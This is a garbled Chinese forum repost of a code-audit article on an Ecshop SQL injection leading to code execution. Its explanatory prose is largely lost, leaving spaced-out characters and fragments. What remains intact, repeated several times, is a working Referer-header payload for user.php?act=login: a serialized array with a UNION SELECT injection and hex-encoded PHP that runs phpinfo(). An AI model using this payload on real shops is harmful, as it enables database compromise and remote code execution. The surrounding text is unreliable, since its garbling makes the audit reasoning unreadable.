[2143] 2020-09-09_Ecshop4.0SQL(代码审计从Nday到0day)

文档创建者:s7ckTeam
浏览次数:11
最后更新:2025-01-16
2020-09-09_Ecshop4.0SQL(代码审计从Nday到0day) E c s h o p   4 . 0   S Q L N d a y 0 d a y     e c h o _ d   E D I   2 0 2 0 - 0 9 - 0 9   #   , 8   ·     0 1 p a y l o a d   R e f e r e r     S Q L R C E ( ) 0 2 H T T P   S Q L r e q u i r e ( d i r n a m e ( _ _ F I L E _ _ ) . ' / i n c l u d e s / i n i t . p h p ' ) ;   / / a d d s l a s h e s _ d e e p
g b k H T T P ( ) 0 3 e c s h o p 3 . 6   p a y l o a d   u s e r . p h p ? a c t = l o g i n       R e f e r e r   4 5 e a 2 0 7 d 7 a 2 b 6 8 c 4 9 5 8 2 d 2 d 2 2 a d f 9 5 3 a a d s   ? a : 2 : { s : 3 : n u m ; s : 1 0 7 : * / S E L E C T 1 , 0 x 2 d 3 1 2 7 2 0 5 5 4 e 4 9 4 f 4 e 2 f 2 a , 2 , 4 , 5 , 6 , 7 , 8 , 0 x 7 b 2 4 6 1 7 3 6 4 2 7 5 d 3 b 7 0 6 8 7 0 6 9 6 e 6 6 6 f 0 9 2 8 2 9 3 b 2 f 2 f 7 d 7 8 7 8 7 8 , 1 0 - -   - ; s : 2 : i d ; s : 1 1 : - 1 U N I O N / * ; }   / / ? 0 x 0 1
H T T P _ R E F E R E R   a s s i g n   ; d i s p l a y   / / a s s i g n   H T T P _ R E F E R E R   $ b a c k _ a c t   0 x 0 2 0 x 0 3 0 x 0 4
$ s m a r t y =   n e w   c l s _ t e m p l a t e ; a s s i g n 0 x 0 5 0 x 0 6
a s s i g n b a c k _ a c t     u s e r _ p a s s p o r t . d w t d i s p l a y D i s p l a y 4 5 e a 2 0 7 d 7 a 2 b 6 8 c 4 9 5 8 2 d 2 d 2 2 a d f 9 5 3 a a d s 0 x 0 7 0 x 0 8 0 x 0 9
_ e c h a s h ? e c h a s h   D i s p l a y 4 5 e a 2 0 7 d 7 a 2 b 6 8 c 4 9 5 8 2 d 2 d 2 2 a d f 9 5 3 a a d s _ e c h a s h     p a y l o a d   4 5 e a 2 0 7 d 7 a 2 b 6 8 c 4 9 5 8 2 d 2 d 2 2 a d f 9 5 3 a a d s       a d s D i s p l a y I n s e r t _ m o d   ? ( | ) 0 x 1 0 0 x 1 1
D i s p l a y I n s e r t _ m o d   a : 2 : { s : 3 : n u m ; s : 1 0 7 : * / S E L E C T   1 , 0 x 2 d 3 1 2 7 2 0 5 5 4 e 4 9 4 f 4 e 2 f 2 a , 2 , 4 , 5 , 6 , 7 , 8 , 0 x 7 b 2 4 6 1 7 3 6 4 2 7 5 d 3 b 7 0 6 8 7 0 6 9 6 e 6 6 6 f 0 9 2 8 2 9 3 b 2 f 2 f 7 d 7 8 7 8 7 8 , 1 0 - - - ; s : 2 : i d ; s : 1 1 : - 1   U N I O N / * ; }   / / ? S Q L _ e c h a s h   i n s e r t _ m o d 0 x 1 2 0 x 1 3
S Q L _ e c h a s h , i n s e r t _ m o d , $ k , a d s | , i n s e r t _ m o d ( k e y 5 , $ k e y % 2 = = 1 S Q L I n s e r t _ m o d   a d s | a : 2 : { s : 3 : " n u m " ; s : 1 0 7 : " * / S E L E C T 1 , 0 x 2 d 3 1 2 7 2 0 5 5 4 e 4 9 4 f 4 e 2 f 2 a , 2 , 4 , 5 , 6 , 7 , 8 , 0 x 7 b 2 4 6 1 7 3 6 4 2 7 5 d 3 b 7 0 6 8 7 0 6 9 6 e 6 6 6 f 0 9 2 8 2 9 3 b 2 f 2 f 7 d 7 8 7 8 7 8 , 1 0 - -   - " ; s : 2 : " i d " ; s : 1 1 : " - 1 '   U N I O N / * " ; } 0 x 1 4 0 x 1 5
S Q L I n s e r t _ m o d , $ f u n a d s   $ p a r a , i n s e r t _ a d s S Q L   S Q L   S Q L   0 x 1 6 0 x 1 7
H T T P   ( ) a s s i g n d i s p l a y   _ e c h a s h , i n s e r t _ m o d i n s e r _ x x x   S Q L 0 4 E c s h o p   4 . 0   S Q L     H T T P 0 x 1 8 0 x 0 1
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则